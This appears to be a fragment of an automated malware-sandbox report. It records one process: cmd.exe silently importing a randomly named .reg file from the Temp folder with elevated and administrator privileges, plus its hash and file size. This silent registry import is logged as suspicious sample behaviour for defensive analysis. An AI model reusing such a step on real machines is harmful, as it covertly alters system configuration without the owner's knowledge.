                                                                                                                                                                                              Commandline:cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

Disassembly

Code Analysis
